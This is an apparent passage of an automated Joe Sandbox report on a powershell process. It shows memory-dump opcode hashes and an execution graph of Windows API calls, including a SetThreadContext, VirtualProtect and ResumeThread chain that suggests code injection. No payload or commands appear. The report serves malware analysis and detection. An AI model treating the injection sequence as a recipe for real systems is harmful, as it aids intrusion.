                                                          • Source File: 0000001D.00000002.2267797197.00007FFD348F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348F0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_29_2_7ffd348f0000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: {'_H
                                                          • API String ID: 0-3848020189
                                                          • Opcode ID: fca0290dc9a08500a356bae45b8028c6282ef4bd632763e1322945e9838a8fc9
                                                          • Instruction ID: aeb1fc999197abb2ab9792bcc25436e47f37784355c45b868c409901daf1100c
                                                          • Opcode Fuzzy Hash: fca0290dc9a08500a356bae45b8028c6282ef4bd632763e1322945e9838a8fc9
                                                          • Instruction Fuzzy Hash: 38F0A723F0EA690BF7B19A5C34A51F563C1DF656207480276D69EE73A2EC0CAC164380
                                                          Memory Dump Source
                                                          • Source File: 0000001D.00000002.2267797197.00007FFD348F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348F0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_29_2_7ffd348f0000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: bed90e89ae41be27aa2ba1972725123a6fc2e5cd6430e3b4bcd6ecbdaf80258e
                                                          • Instruction ID: 1b6fc63ad809fb9f294d9d1d03c8e8355b75c768dee61f558575435ac399503b
                                                          • Opcode Fuzzy Hash: bed90e89ae41be27aa2ba1972725123a6fc2e5cd6430e3b4bcd6ecbdaf80258e
                                                          • Instruction Fuzzy Hash: 2D31EA73B0DA495FEB94DB1C98951B877E1FFAA314714027FD48ED3252DA25EC028741
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000001D.00000002.2260307649.00007FFD34670000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34670000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_29_2_7ffd34670000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: LR_L$^
                                                          • API String ID: 0-475922714
                                                          • Opcode ID: 47b722974e52d104bc799d4b38b81e339e90457ed558faeceefec1a0157f1496
                                                          • Instruction ID: 73b209b35192f08b907b958d03c665e817f0f30ccbe14f1238c350b72f349372
                                                          • Opcode Fuzzy Hash: 47b722974e52d104bc799d4b38b81e339e90457ed558faeceefec1a0157f1496
                                                          • Instruction Fuzzy Hash: 53620331B0C79A4FEB55DF2CC8A55E97FE0EF96314F1441BAD189C7293DA28A842C781
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000001D.00000002.2260307649.00007FFD34670000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34670000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_29_2_7ffd34670000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: -N_^
                                                          • API String ID: 0-3102225757
                                                          • Opcode ID: d377ab8ec4feab91d8ece4c3522071b8ed6f0476df4e469f26bf21c888263ece
                                                          • Instruction ID: 75e3337470f9f46f97dcddbbb309ff91e47e627bfff1e294a7f3cfab0cf269a7
                                                          • Opcode Fuzzy Hash: d377ab8ec4feab91d8ece4c3522071b8ed6f0476df4e469f26bf21c888263ece
                                                          • Instruction Fuzzy Hash: CE514256A0E7D61EE7235B785CB60EA7FA5DF53268B0940F7C2D4CE193ED0C2406A212
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000001D.00000002.2260307649.00007FFD34670000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34670000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_29_2_7ffd34670000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: ^
                                                          • API String ID: 0-1590793086
                                                          • Opcode ID: 5abf550963b5798cf30258f1d295fb91103dc1f1da305662261fea64c5c85088
                                                          • Instruction ID: a2b870feb85a31db4ad6a359aef2754d8169be729c4b80f705bceb62d04e0cde
                                                          • Opcode Fuzzy Hash: 5abf550963b5798cf30258f1d295fb91103dc1f1da305662261fea64c5c85088
                                                          • Instruction Fuzzy Hash: 1D417657A0E7E64BE7628E6C5CFA0E93FD0DF13718B0D40BACA84CB093ED0D64569645
                                                          Memory Dump Source
                                                          • Source File: 0000001D.00000002.2260307649.00007FFD34670000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34670000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_29_2_7ffd34670000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: d69584a4d6211167082b4075d075cb6932da12dd17b2f1cf15c46c1841f71526
                                                          • Instruction ID: 9011191b2194591203ccc773f44b687fcbb698fa873b75d11769762092a1c063
                                                          • Opcode Fuzzy Hash: d69584a4d6211167082b4075d075cb6932da12dd17b2f1cf15c46c1841f71526
                                                          • Instruction Fuzzy Hash: ADD1D431F08A598FDB85DF5CC8A5AED7FE1FF66310F04817AD449D7292DA28A881C781
                                                          Memory Dump Source
                                                          • Source File: 0000001D.00000002.2260307649.00007FFD34670000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34670000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_29_2_7ffd34670000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 195113558649c57485cf447998ec7470fdf26c9f29f44bf3f0e1e67a92977364
                                                          • Instruction ID: c0dc1fa3c66be6765f0b57ab8aaab0ae2f71b4de0d2e75f7ceb6fad88ad8d21b
                                                          • Opcode Fuzzy Hash: 195113558649c57485cf447998ec7470fdf26c9f29f44bf3f0e1e67a92977364
                                                          • Instruction Fuzzy Hash: 46C1C631A0CA5A4FDF95DF5CC8A5AE97FE1FFA6310F14417AD149D7292CA28E842C780
                                                          Memory Dump Source
                                                          • Source File: 0000001D.00000002.2260307649.00007FFD34670000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34670000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_29_2_7ffd34670000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 8e7236da04a8507d82c35f457b1f7fdbd07dfac3bdcca5cbb46649d0cf1b4de1
                                                          • Instruction ID: c18fcee0c5a70373d4cb95818aeeb30e15ce58d51b0d8dd1ef090a992e2fda71
                                                          • Opcode Fuzzy Hash: 8e7236da04a8507d82c35f457b1f7fdbd07dfac3bdcca5cbb46649d0cf1b4de1
                                                          • Instruction Fuzzy Hash: D0719F5660E3E25FE3135B685CB51E63FA0DF93224B4A44FBC6C5CE0A3D90C144AD3A1
                                                          Memory Dump Source
                                                          • Source File: 0000001D.00000002.2260307649.00007FFD34670000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34670000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_29_2_7ffd34670000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: f445f87037e5effe460e8a35645462844381adb5b597771e90438fb1c1a560bd
                                                          • Instruction ID: 5716136a3bb2e497e67fecbb667adf3fb3576dca4eb615f25590be7e2dedbd5d
                                                          • Opcode Fuzzy Hash: f445f87037e5effe460e8a35645462844381adb5b597771e90438fb1c1a560bd
                                                          • Instruction Fuzzy Hash: 92516456A0D7D61EE7236B785CB60EA7FA5DF53268B0940F7C2D4CE193ED0C2447A212

                                                          Execution Graph

                                                          Execution Coverage:0.8%
                                                          Dynamic/Decrypted Code Coverage:0%
                                                          Signature Coverage:2.3%
                                                          Total number of Nodes:1393
                                                          Total number of Limit Nodes:1
Execution graph (rendered graph data omitted): nodes cover code at 1d29e8c152c-1d29e8d5395. The node at 1d29e8c6120 chains SetThreadContext, VirtualProtect, FlushInstructionCache, GetCurrentProcess, VirtualFree and ResumeThread. Other Windows APIs reached from the graph: EnterCriticalSection, LeaveCriticalSection, GetModuleHandleW, GetModuleHandleExW, GetProcAddress, LoadLibraryExW, FreeLibrary, GetProcessHeap, HeapAlloc, HeapReAlloc, HeapFree, HeapSize, GetEnvironmentStringsW, FreeEnvironmentStringsW, WideCharToMultiByte, MultiByteToWideChar, FlsGetValue, FlsSetValue, TlsGetValue, GetLastError, GetACP, GetOEMCP, IsValidCodePage, GetCPInfo, PdhGetCounterInfoW, OpenProcess, K32GetModuleFileNameExW, CloseHandle, PathFindFileNameW, lstrlenW, StrCpyW, StrCmpW, StrCmpNW, StrCmpNIW, StrStrW, StrToIntW, RtlLookupFunctionEntry and RtlUnwindEx. Named runtime routines in the graph: _log10_special, _invalid_parameter_noinfo, __free_lconv_mon, __std_exception_copy, __CxxCallCatchBlock, __vcrt_InitializeCriticalSectionEx, __except_validate_context_record, __GetCurrentState, Is_bad_exception_allowed, __FrameHandler3::GetHandlerSearchState, __FrameHandler3::FrameUnwindToEmptyState, std::bad_alloc::bad_alloc and Concurrency::cancel_current_task.
8355 1d29e8cb890 __FrameHandler3::GetHandlerSearchState 8417 1d29e8ca534 8355->8417 8356 1d29e8cb8b3 8357 1d29e8ca4fc __GetUnwindTryBlock RtlLookupFunctionEntry 8356->8357 8359 1d29e8ca9d6 8357->8359 8359->8283 8359->8285 8359->8289 8361 1d29e8c9a64 __CxxCallCatchBlock 9 API calls 8360->8361 8362 1d29e8ca162 8361->8362 8362->8283 8362->8316 8365 1d29e8cb9c3 8363->8365 8367 1d29e8cb907 8363->8367 8364 1d29e8caaa2 8364->8285 8364->8332 8366 1d29e8ca128 9 API calls 8366->8367 8367->8364 8367->8366 8368 1d29e8ca114 Is_bad_exception_allowed 9 API calls 8367->8368 8369 1d29e8cb068 9 API calls 8367->8369 8368->8367 8369->8367 8371 1d29e8cba39 8370->8371 8373 1d29e8cb9e9 Is_bad_exception_allowed 8370->8373 8371->8336 8372 1d29e8ca114 9 API calls Is_bad_exception_allowed 8372->8373 8373->8371 8373->8372 8375 1d29e8cb124 8374->8375 8376 1d29e8cb095 8374->8376 8375->8322 8377 1d29e8ca114 Is_bad_exception_allowed 9 API calls 8376->8377 8378 1d29e8cb09e 8377->8378 8378->8375 8379 1d29e8ca114 Is_bad_exception_allowed 9 API calls 8378->8379 8380 1d29e8cb0b7 8378->8380 8379->8380 8380->8375 8381 1d29e8cb0e3 8380->8381 8382 1d29e8ca114 Is_bad_exception_allowed 9 API calls 8380->8382 8383 1d29e8ca128 9 API calls 8381->8383 8382->8381 8384 1d29e8cb0f7 8383->8384 8384->8375 8385 1d29e8cb110 8384->8385 8386 1d29e8ca114 Is_bad_exception_allowed 9 API calls 8384->8386 8387 1d29e8ca128 9 API calls 8385->8387 8386->8385 8387->8375 8389 1d29e8c9d74 __FrameHandler3::GetHandlerSearchState RtlLookupFunctionEntry 8388->8389 8390 1d29e8ca8dd 8389->8390 8391 1d29e8ca114 Is_bad_exception_allowed 9 API calls 8390->8391 8392 1d29e8ca915 8391->8392 8393 1d29e8c9f80 9 API calls 8392->8393 8394 1d29e8ca959 8393->8394 8394->8322 8396 1d29e8c9cf8 __FrameHandler3::GetHandlerSearchState 8395->8396 8397 1d29e8c9c80 __FrameHandler3::ExecutionInCatch 9 API calls 8396->8397 8398 1d29e8c9d02 8397->8398 8398->8300 8400 1d29e8c7d70 _log10_special 8 API calls 8399->8400 8401 1d29e8ca07a 8400->8401 8401->8325 8403 
1d29e8cae82 8402->8403 8410 1d29e8caef0 8402->8410 8404 1d29e8c9a64 __CxxCallCatchBlock 9 API calls 8403->8404 8405 1d29e8cae87 8404->8405 8406 1d29e8cae96 EncodePointer 8405->8406 8412 1d29e8caeec 8405->8412 8407 1d29e8c9a64 __CxxCallCatchBlock 9 API calls 8406->8407 8408 1d29e8caea6 8407->8408 8408->8412 8420 1d29e8c9c2c 8408->8420 8410->8325 8411 1d29e8ca8a0 19 API calls 8411->8412 8412->8410 8412->8411 8413 1d29e8ca114 9 API calls Is_bad_exception_allowed 8412->8413 8413->8412 8415 1d29e8c9d74 __FrameHandler3::GetHandlerSearchState RtlLookupFunctionEntry 8414->8415 8416 1d29e8ca50f 8415->8416 8416->8355 8416->8356 8418 1d29e8c9d74 __FrameHandler3::GetHandlerSearchState RtlLookupFunctionEntry 8417->8418 8419 1d29e8ca54e 8418->8419 8419->8359 8421 1d29e8c9a64 __CxxCallCatchBlock 9 API calls 8420->8421 8422 1d29e8c9c58 8421->8422 8422->8412 8935 1d29e8cb53e 8936 1d29e8c9a64 __CxxCallCatchBlock 9 API calls 8935->8936 8938 1d29e8cb54b __CxxCallCatchBlock 8936->8938 8937 1d29e8cb58f RaiseException 8939 1d29e8cb5b6 8937->8939 8938->8937 8940 1d29e8ca0c0 __CxxCallCatchBlock 9 API calls 8939->8940 8943 1d29e8cb5be 8940->8943 8941 1d29e8c9a64 __CxxCallCatchBlock 9 API calls 8942 1d29e8cb5fa 8941->8942 8944 1d29e8c9a64 __CxxCallCatchBlock 9 API calls 8942->8944 8945 1d29e8c9750 __CxxCallCatchBlock 9 API calls 8943->8945 8947 1d29e8cb5e7 __CxxCallCatchBlock 8943->8947 8946 1d29e8cb603 8944->8946 8945->8947 8947->8941 7699 1d29e8c8440 7702 1d29e8c9818 7699->7702 7701 1d29e8c8469 7703 1d29e8c986e __vcrt_freefls 7702->7703 7704 1d29e8c9839 7702->7704 7703->7701 7704->7703 7706 1d29e8ccb18 7704->7706 7707 1d29e8ccb2f 7706->7707 7708 1d29e8ccb25 7706->7708 7715 1d29e8cdadc 7707->7715 7708->7707 7713 1d29e8ccb4a 7708->7713 7710 1d29e8ccb36 7718 1d29e8cd9a0 7710->7718 7711 1d29e8ccb42 7711->7703 7713->7711 7714 1d29e8cdadc __free_lconv_mon 11 API calls 7713->7714 7714->7710 7721 1d29e8cd3d0 GetLastError 7715->7721 7717 1d29e8cdae5 7717->7710 7779 1d29e8cd838 7718->7779 7722 
1d29e8cd411 FlsSetValue 7721->7722 7725 1d29e8cd3f4 7721->7725 7723 1d29e8cd401 SetLastError 7722->7723 7724 1d29e8cd423 7722->7724 7723->7717 7738 1d29e8cdafc 7724->7738 7725->7722 7725->7723 7729 1d29e8cd450 FlsSetValue 7732 1d29e8cd46e 7729->7732 7733 1d29e8cd45c FlsSetValue 7729->7733 7730 1d29e8cd440 FlsSetValue 7731 1d29e8cd449 7730->7731 7745 1d29e8cdb74 7731->7745 7751 1d29e8ccfc4 7732->7751 7733->7731 7743 1d29e8cdb0d _invalid_parameter_noinfo 7738->7743 7739 1d29e8cdb5e 7742 1d29e8cdadc __free_lconv_mon 10 API calls 7739->7742 7740 1d29e8cdb42 HeapAlloc 7741 1d29e8cd432 7740->7741 7740->7743 7741->7729 7741->7730 7742->7741 7743->7739 7743->7740 7756 1d29e8cbc8c 7743->7756 7746 1d29e8cdbaa 7745->7746 7747 1d29e8cdb79 HeapFree 7745->7747 7746->7723 7747->7746 7748 1d29e8cdb94 GetLastError 7747->7748 7749 1d29e8cdba1 __free_lconv_mon 7748->7749 7750 1d29e8cdadc __free_lconv_mon 9 API calls 7749->7750 7750->7746 7765 1d29e8cce9c 7751->7765 7759 1d29e8cbccc 7756->7759 7764 1d29e8ccdcc EnterCriticalSection 7759->7764 7777 1d29e8ccdcc EnterCriticalSection 7765->7777 7780 1d29e8cd863 7779->7780 7787 1d29e8cd8d4 7780->7787 7783 1d29e8cd8ad 7785 1d29e8cd8c2 7783->7785 7786 1d29e8ccbd0 _invalid_parameter_noinfo 28 API calls 7783->7786 7785->7711 7786->7785 7810 1d29e8cd61c 7787->7810 7791 1d29e8cd88a 7791->7783 7797 1d29e8ccbd0 7791->7797 7798 1d29e8ccbdf GetLastError 7797->7798 7799 1d29e8ccc28 7797->7799 7800 1d29e8ccbf4 7798->7800 7799->7783 7801 1d29e8cd498 _invalid_parameter_noinfo 14 API calls 7800->7801 7802 1d29e8ccc0e SetLastError 7801->7802 7802->7799 7803 1d29e8ccc31 7802->7803 7804 1d29e8ccbd0 _invalid_parameter_noinfo 26 API calls 7803->7804 7805 1d29e8ccc57 7804->7805 7859 1d29e8d0860 7805->7859 7811 1d29e8cd638 GetLastError 7810->7811 7812 1d29e8cd673 7810->7812 7813 1d29e8cd648 7811->7813 7812->7791 7816 1d29e8cd688 7812->7816 7823 1d29e8cd498 7813->7823 7817 1d29e8cd6a4 GetLastError SetLastError 7816->7817 7818 1d29e8cd6bc 7816->7818 7817->7818 
7818->7791 7819 1d29e8cd9c0 IsProcessorFeaturePresent 7818->7819 7820 1d29e8cd9d3 7819->7820 7837 1d29e8cd6d4 7820->7837 7824 1d29e8cd4b7 FlsGetValue 7823->7824 7826 1d29e8cd4cc 7823->7826 7825 1d29e8cd4c4 SetLastError 7824->7825 7824->7826 7825->7812 7826->7825 7827 1d29e8cdafc _invalid_parameter_noinfo 11 API calls 7826->7827 7828 1d29e8cd4ee 7827->7828 7829 1d29e8cd50c FlsSetValue 7828->7829 7832 1d29e8cd4fc 7828->7832 7830 1d29e8cd52a 7829->7830 7831 1d29e8cd518 FlsSetValue 7829->7831 7833 1d29e8ccfc4 _invalid_parameter_noinfo 11 API calls 7830->7833 7831->7832 7834 1d29e8cdb74 __free_lconv_mon 11 API calls 7832->7834 7835 1d29e8cd532 7833->7835 7834->7825 7836 1d29e8cdb74 __free_lconv_mon 11 API calls 7835->7836 7836->7825 7838 1d29e8cd70e _invalid_parameter_noinfo 7837->7838 7839 1d29e8cd736 RtlCaptureContext RtlLookupFunctionEntry 7838->7839 7840 1d29e8cd770 RtlVirtualUnwind 7839->7840 7841 1d29e8cd7a6 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 7839->7841 7840->7841 7842 1d29e8cd7f8 _invalid_parameter_noinfo 7841->7842 7845 1d29e8c7d70 7842->7845 7847 1d29e8c7d79 7845->7847 7846 1d29e8c7d84 GetCurrentProcess TerminateProcess 7847->7846 7848 1d29e8c855c IsProcessorFeaturePresent 7847->7848 7849 1d29e8c8574 7848->7849 7854 1d29e8c8750 RtlCaptureContext 7849->7854 7855 1d29e8c876a RtlLookupFunctionEntry 7854->7855 7856 1d29e8c8780 RtlVirtualUnwind 7855->7856 7857 1d29e8c8587 7855->7857 7856->7855 7856->7857 7858 1d29e8c8528 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 7857->7858 7860 1d29e8d0879 7859->7860 7862 1d29e8ccc7f 7859->7862 7860->7862 7867 1d29e8d0e8c 7860->7867 7863 1d29e8d08cc 7862->7863 7864 1d29e8ccc8f 7863->7864 7865 1d29e8d08e5 7863->7865 7864->7783 7865->7864 7913 1d29e8cf120 7865->7913 7876 1d29e8cd258 GetLastError 7867->7876 7869 1d29e8d0e9b 7875 1d29e8d0ee1 7869->7875 7912 1d29e8ccdcc EnterCriticalSection 7869->7912 7875->7862 7877 1d29e8cd27c FlsGetValue 7876->7877 7878 
1d29e8cd299 FlsSetValue 7876->7878 7879 1d29e8cd293 7877->7879 7896 1d29e8cd289 7877->7896 7880 1d29e8cd2ab 7878->7880 7878->7896 7879->7878 7882 1d29e8cdafc _invalid_parameter_noinfo 11 API calls 7880->7882 7881 1d29e8cd305 SetLastError 7883 1d29e8cd312 7881->7883 7890 1d29e8cd325 7881->7890 7884 1d29e8cd2ba 7882->7884 7883->7869 7885 1d29e8cd2d8 FlsSetValue 7884->7885 7886 1d29e8cd2c8 FlsSetValue 7884->7886 7888 1d29e8cd2f6 7885->7888 7889 1d29e8cd2e4 FlsSetValue 7885->7889 7887 1d29e8cd2d1 7886->7887 7891 1d29e8cdb74 __free_lconv_mon 11 API calls 7887->7891 7892 1d29e8ccfc4 _invalid_parameter_noinfo 11 API calls 7888->7892 7889->7887 7894 1d29e8cd33d FlsGetValue 7890->7894 7895 1d29e8cd358 FlsSetValue 7890->7895 7891->7896 7893 1d29e8cd2fe 7892->7893 7897 1d29e8cdb74 __free_lconv_mon 11 API calls 7893->7897 7898 1d29e8cd352 7894->7898 7901 1d29e8cd34a 7894->7901 7899 1d29e8cd365 7895->7899 7895->7901 7896->7881 7897->7881 7898->7895 7900 1d29e8cdafc _invalid_parameter_noinfo 11 API calls 7899->7900 7902 1d29e8cd374 7900->7902 7901->7869 7903 1d29e8cd392 FlsSetValue 7902->7903 7904 1d29e8cd382 FlsSetValue 7902->7904 7906 1d29e8cd39e FlsSetValue 7903->7906 7907 1d29e8cd3b0 7903->7907 7905 1d29e8cd38b 7904->7905 7908 1d29e8cdb74 __free_lconv_mon 11 API calls 7905->7908 7906->7905 7909 1d29e8ccfc4 _invalid_parameter_noinfo 11 API calls 7907->7909 7908->7901 7910 1d29e8cd3b8 7909->7910 7911 1d29e8cdb74 __free_lconv_mon 11 API calls 7910->7911 7911->7901 7914 1d29e8cd258 _invalid_parameter_noinfo 23 API calls 7913->7914 7915 1d29e8cf129 7914->7915 9093 1d29e8c7ec0 9094 1d29e8c7ec9 __scrt_acquire_startup_lock 9093->9094 9096 1d29e8c7ecd 9094->9096 9097 1d29e8cc38c 9094->9097 9098 1d29e8cc3c3 9097->9098 9099 1d29e8cc3ac 9097->9099 9098->9096 9100 1d29e8cc3ca 9099->9100 9101 1d29e8cc3b4 9099->9101 9103 1d29e8cf0c0 69 API calls 9100->9103 9102 1d29e8cdadc __free_lconv_mon 11 API calls 9101->9102 9104 1d29e8cc3b9 9102->9104 9105 1d29e8cc3cf 9103->9105 9106 1d29e8cd9a0 
_invalid_parameter_noinfo 49 API calls 9104->9106 9128 1d29e8ce7a4 GetModuleFileNameW 9105->9128 9106->9098 9113 1d29e8cc441 9115 1d29e8cdadc __free_lconv_mon 11 API calls 9113->9115 9114 1d29e8cc459 9116 1d29e8cc164 23 API calls 9114->9116 9117 1d29e8cc446 9115->9117 9121 1d29e8cc475 9116->9121 9118 1d29e8cdb74 __free_lconv_mon 11 API calls 9117->9118 9118->9098 9119 1d29e8cc47b 9120 1d29e8cdb74 __free_lconv_mon 11 API calls 9119->9120 9120->9098 9121->9119 9122 1d29e8cc4c0 9121->9122 9123 1d29e8cc4a7 9121->9123 9126 1d29e8cdb74 __free_lconv_mon 11 API calls 9122->9126 9124 1d29e8cdb74 __free_lconv_mon 11 API calls 9123->9124 9125 1d29e8cc4b0 9124->9125 9127 1d29e8cdb74 __free_lconv_mon 11 API calls 9125->9127 9126->9119 9127->9098 9129 1d29e8ce7fd 9128->9129 9130 1d29e8ce7e9 GetLastError 9128->9130 9132 1d29e8ce5e4 23 API calls 9129->9132 9152 1d29e8cda50 9130->9152 9134 1d29e8ce82b 9132->9134 9133 1d29e8ce7f6 9135 1d29e8c7d70 _log10_special 8 API calls 9133->9135 9139 1d29e8ce83c 9134->9139 9157 1d29e8cf9d8 9134->9157 9138 1d29e8cc3e6 9135->9138 9140 1d29e8cc164 9138->9140 9160 1d29e8ce688 9139->9160 9142 1d29e8cc1a2 9140->9142 9144 1d29e8cc20e 9142->9144 9174 1d29e8cf470 9142->9174 9143 1d29e8cc2ff 9146 1d29e8cc32c 9143->9146 9144->9143 9145 1d29e8cf470 23 API calls 9144->9145 9145->9144 9147 1d29e8cc37c 9146->9147 9148 1d29e8cc344 9146->9148 9147->9113 9147->9114 9148->9147 9149 1d29e8cdafc _invalid_parameter_noinfo 11 API calls 9148->9149 9150 1d29e8cc372 9149->9150 9151 1d29e8cdb74 __free_lconv_mon 11 API calls 9150->9151 9151->9147 9153 1d29e8cd3d0 __free_lconv_mon 11 API calls 9152->9153 9154 1d29e8cda5d __free_lconv_mon 9153->9154 9155 1d29e8cd3d0 __free_lconv_mon 11 API calls 9154->9155 9156 1d29e8cda7f 9155->9156 9156->9133 9158 1d29e8cf7c4 5 API calls 9157->9158 9159 1d29e8cf9f8 9158->9159 9159->9139 9161 1d29e8ce6c7 9160->9161 9165 1d29e8ce6ac 9160->9165 9162 1d29e8cf53c WideCharToMultiByte 9161->9162 9167 1d29e8ce6cc 9161->9167 9163 1d29e8ce723 
9162->9163 9166 1d29e8ce72a GetLastError 9163->9166 9163->9167 9168 1d29e8ce755 9163->9168 9164 1d29e8cdadc __free_lconv_mon 11 API calls 9164->9165 9165->9133 9169 1d29e8cda50 11 API calls 9166->9169 9167->9164 9167->9165 9170 1d29e8cf53c WideCharToMultiByte 9168->9170 9171 1d29e8ce737 9169->9171 9172 1d29e8ce77c 9170->9172 9173 1d29e8cdadc __free_lconv_mon 11 API calls 9171->9173 9172->9165 9172->9166 9173->9165 9175 1d29e8cf3fc 9174->9175 9176 1d29e8ce5e4 23 API calls 9175->9176 9177 1d29e8cf420 9176->9177 9177->9142 9178 1d29e8c30bc 9179 1d29e8c30ec 9178->9179 9180 1d29e8c31a5 9179->9180 9181 1d29e8c3109 PdhGetCounterInfoW 9179->9181 9181->9180 9182 1d29e8c3127 GetProcessHeap HeapAlloc PdhGetCounterInfoW 9181->9182 9183 1d29e8c3191 GetProcessHeap HeapFree 9182->9183 9184 1d29e8c3159 StrCmpW 9182->9184 9183->9180 9184->9183 9186 1d29e8c316e 9184->9186 9185 1d29e8c3554 12 API calls 9185->9186 9186->9183 9186->9185 9187 1d29e8c5cbc 9188 1d29e8c5cc3 9187->9188 9189 1d29e8c5cf0 VirtualProtect 9188->9189 9191 1d29e8c5c00 9188->9191 9190 1d29e8c5d19 GetLastError 9189->9190 9189->9191 9190->9191 8423 1d29e8cc9bc 8424 1d29e8cc9d5 8423->8424 8425 1d29e8cc9ed 8423->8425 8424->8425 8426 1d29e8cdb74 __free_lconv_mon 11 API calls 8424->8426 8426->8425 9192 1d29e8cfebc 9193 1d29e8cfec8 9192->9193 9194 1d29e8cfeef 9193->9194 9196 1d29e8d20ec 9193->9196 9197 1d29e8d20f1 9196->9197 9201 1d29e8d212c 9196->9201 9198 1d29e8d2112 DeleteCriticalSection 9197->9198 9199 1d29e8d2124 9197->9199 9198->9198 9198->9199 9200 1d29e8cdb74 __free_lconv_mon 11 API calls 9199->9200 9200->9201 9201->9193 8427 1d29e8d07b8 8428 1d29e8d07c3 8427->8428 8436 1d29e8d30b8 8428->8436 8449 1d29e8ccdcc EnterCriticalSection 8436->8449 9202 1d29e8d52b3 9205 1d29e8c97a4 9202->9205 9206 1d29e8c97ce 9205->9206 9207 1d29e8c97bc 9205->9207 9209 1d29e8c9a64 __CxxCallCatchBlock 9 API calls 9206->9209 9207->9206 9208 1d29e8c97c4 9207->9208 9211 1d29e8c9a64 __CxxCallCatchBlock 9 API calls 9208->9211 9214 1d29e8c97cc 
9208->9214 9210 1d29e8c97d3 9209->9210 9212 1d29e8c9a64 __CxxCallCatchBlock 9 API calls 9210->9212 9210->9214 9213 1d29e8c97f3 9211->9213 9212->9214 9215 1d29e8c9a64 __CxxCallCatchBlock 9 API calls 9213->9215 9216 1d29e8c9800 9215->9216 9217 1d29e8ccad8 23 API calls 9216->9217 9218 1d29e8c9809 9217->9218 9219 1d29e8ccad8 23 API calls 9218->9219 9220 1d29e8c9815 9219->9220 8948 1d29e8c2334 GetProcessIdOfThread GetCurrentProcessId 8949 1d29e8c235f CreateFileW 8948->8949 8950 1d29e8c23da 8948->8950 8949->8950 8951 1d29e8c2393 WriteFile ReadFile CloseHandle 8949->8951 8951->8950 7916 1d29e8c9435 7917 1d29e8c9448 __CxxCallCatchBlock _IsNonwritableInCurrentImage __except_validate_context_record 7916->7917 7918 1d29e8c9539 7917->7918 7919 1d29e8c9504 RtlUnwindEx 7917->7919 7919->7917 9221 1d29e8d50cf 9222 1d29e8d5152 9221->9222 9223 1d29e8d50e7 9221->9223 9223->9222 9224 1d29e8c9a64 __CxxCallCatchBlock 9 API calls 9223->9224 9225 1d29e8d5134 9224->9225 9226 1d29e8c9a64 __CxxCallCatchBlock 9 API calls 9225->9226 9227 1d29e8d5149 9226->9227 9228 1d29e8ccad8 23 API calls 9227->9228 9228->9222 9229 1d29e8d1ed0 9230 1d29e8cf0c0 69 API calls 9229->9230 9231 1d29e8d1ed9 9230->9231 8952 1d29e8c7f4c 8953 1d29e8c7f70 __scrt_acquire_startup_lock 8952->8953 8954 1d29e8cbd15 8953->8954 8955 1d29e8cd3d0 __free_lconv_mon 11 API calls 8953->8955 8956 1d29e8cbd3e 8955->8956 9232 1d29e8cdecc 9233 1d29e8cdef1 9232->9233 9241 1d29e8cdf08 9232->9241 9234 1d29e8cdadc __free_lconv_mon 11 API calls 9233->9234 9235 1d29e8cdef6 9234->9235 9237 1d29e8cd9a0 _invalid_parameter_noinfo 49 API calls 9235->9237 9236 1d29e8cdfc0 9238 1d29e8cc32c 11 API calls 9236->9238 9260 1d29e8cdf01 9237->9260 9239 1d29e8ce018 9238->9239 9240 1d29e8ce020 9239->9240 9249 1d29e8ce052 9239->9249 9243 1d29e8cdb74 __free_lconv_mon 11 API calls 9240->9243 9241->9236 9246 1d29e8cdf98 9241->9246 9248 1d29e8cdf55 9241->9248 9264 1d29e8ce110 9241->9264 9245 1d29e8ce027 9243->9245 9244 1d29e8ce0b1 9247 1d29e8cdb74 
